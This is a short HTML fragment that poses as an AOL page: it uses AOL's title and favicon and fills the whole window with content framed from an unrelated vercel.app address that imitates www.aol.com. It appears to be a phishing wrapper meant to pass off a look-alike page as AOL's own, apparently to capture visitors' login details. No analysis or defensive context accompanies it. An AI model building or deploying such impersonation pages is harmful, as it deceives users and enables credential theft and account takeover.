<title>AOL</title> 
<link rel="shortcut icon" type="image/png" href="https://s.yimg.com/wm/login/aol-favicon.png">
<object data=https://newaup.vercel.app/www.aol.com/newaup.html width="100%" height="100%"></object> 
